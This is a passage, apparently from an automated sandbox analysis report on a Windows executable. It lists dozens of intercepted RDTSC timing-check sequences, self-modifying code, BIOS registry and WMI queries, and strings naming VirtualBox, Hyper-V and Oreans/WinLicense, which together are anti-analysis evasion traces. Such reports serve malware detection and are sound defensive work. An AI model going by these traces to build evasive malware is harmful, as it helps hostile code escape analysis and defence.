            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A282E2 second address: A282E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A282E8 second address: A282F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA6C4EBA07Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A28425 second address: A2844F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4CAD511h 0x00000009 jmp 00007FA6C4CAD515h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A2844F second address: A28495 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA6C4EBA076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FA6C4EBA078h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 jl 00007FA6C4EBA076h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FA6C4EBA084h 0x00000026 jmp 00007FA6C4EBA07Fh 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A288CE second address: A288F5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA6C4CAD50Eh 0x00000008 jc 00007FA6C4CAD50Ch 0x0000000e jo 00007FA6C4CAD506h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FA6C4CAD506h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A28E8D second address: A28EAD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6C4EBA07Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA6C4EBA080h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A296F8 second address: A296FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A296FC second address: A29700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A29700 second address: A29712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FA6C4CAD506h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A29712 second address: A29716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31B41 second address: A31B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FA6C4CAD506h 0x0000000e jmp 00007FA6C4CAD514h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31B63 second address: A31B6D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA6C4EBA076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31B6D second address: A31B74 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31DF3 second address: A31E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4EBA07Ah 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31E01 second address: A31E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31E05 second address: A31E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FA6C4EBA076h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31E13 second address: A31E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31F87 second address: A31FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FA6C4EBA086h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31FA2 second address: A31FA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31FA7 second address: A31FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4EBA086h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A32128 second address: A32135 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4CAD506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A32278 second address: A32294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4EBA088h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A32294 second address: A322A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 ja 00007FA6C4CAD506h 0x0000000d pop edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A322A2 second address: A322AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA6C4EBA076h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A322AC second address: A322B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A3A47F second address: A3A498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007FA6C4EBA076h 0x0000000c popad 0x0000000d jnp 00007FA6C4EBA07Ch 0x00000013 jc 00007FA6C4EBA076h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A388BC second address: A388CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA6C4CAD506h 0x0000000a jc 00007FA6C4CAD506h 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A38B5B second address: A38B6A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6C4EBA07Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A38CFA second address: A38D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4CAD514h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A39279 second address: A3927D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A3927D second address: A3928D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD50Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A3928D second address: A39299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FA6C4EBA076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A39299 second address: A3929D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A3A348 second address: A3A34C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A3A34C second address: A3A357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A382A7 second address: A382BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007FA6C4EBA076h 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A382BB second address: A382C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A41B64 second address: A41B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A41B69 second address: A41B6E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A4158D second address: A41599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA6C4EBA076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A4171E second address: A4172E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6C4CAD506h 0x00000008 js 00007FA6C4CAD506h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A4E5E1 second address: A4E5E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A4E5E7 second address: A4E5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A4E5ED second address: A4E60A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA07Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jno 00007FA6C4EBA076h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A4E60A second address: A4E60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A51132 second address: A51142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FA6C4EBA07Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A51142 second address: A51155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6C4CAD50Bh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A50CB0 second address: A50CC3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA6C4EBA076h 0x00000008 jbe 00007FA6C4EBA076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A5386D second address: A53877 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4CAD506h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A53877 second address: A53882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A539DA second address: A539DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A539DF second address: A539E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A539E4 second address: A539EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A5C0FC second address: A5C125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA6C4EBA076h 0x0000000a popad 0x0000000b pushad 0x0000000c jbe 00007FA6C4EBA076h 0x00000012 jmp 00007FA6C4EBA084h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A5D741 second address: A5D747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A5D747 second address: A5D74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A64B11 second address: A64B1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A64B1D second address: A64B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edi 0x0000000a jmp 00007FA6C4EBA07Fh 0x0000000f js 00007FA6C4EBA076h 0x00000015 pop edi 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A64B3D second address: A64B59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD50Fh 0x00000007 pushad 0x00000008 ja 00007FA6C4CAD506h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A64941 second address: A64947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A64947 second address: A64951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6C4CAD506h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A6D952 second address: A6D956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A6C5CC second address: A6C5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A6C9DC second address: A6C9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A6C9E8 second address: A6C9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A6D621 second address: A6D63A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FA6C4EBA07Eh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A72504 second address: A72516 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FA6C4CAD50Eh 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A72516 second address: A7251A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A7251A second address: A72546 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA6C4CAD519h 0x00000008 pop esi 0x00000009 pushad 0x0000000a jbe 00007FA6C4CAD506h 0x00000010 jg 00007FA6C4CAD506h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A74143 second address: A74147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A74147 second address: A74151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A7E3E5 second address: A7E3EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A7E254 second address: A7E25E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA6C4CAD506h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A7E25E second address: A7E264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A7E264 second address: A7E27C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6C4CAD508h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FA6C4CAD506h 0x00000012 jg 00007FA6C4CAD506h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A83584 second address: A8358A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A7CB42 second address: A7CB5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD518h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A904AD second address: A904C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA07Eh 0x00000007 jng 00007FA6C4EBA076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A8FFF1 second address: A8FFFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FA6C4CAD506h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A90196 second address: A901CE instructions: 0x00000000 rdtsc 0x00000002 je 00007FA6C4EBA076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA6C4EBA089h 0x0000000f jmp 00007FA6C4EBA082h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A901CE second address: A901D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AA5438 second address: AA5454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA6C4EBA086h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AA55AE second address: AA55FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FA6C4CAD506h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007FA6C4CAD506h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 je 00007FA6C4CAD542h 0x0000001e js 00007FA6C4CAD51Bh 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007FA6C4CAD513h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA6C4CAD511h 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AA5E2A second address: AA5E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AA5E30 second address: AA5E4F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007FA6C4CAD506h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FA6C4CAD50Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AA613B second address: AA6140 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Special instruction interceptor: First address: 808A42 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Special instruction interceptor: First address: 9C6851 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Code function: 0_2_0080C72D rdtsc 0_2_0080C72D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe TID: 2076 Thread sleep time: -150000s >= -30000s
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe TID: 1892 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: x6VtGfW26X.exe, x6VtGfW26X.exe, 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1824627069.00000000011E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1824627069.00000000011E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
            Source: x6VtGfW26X.exe, 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
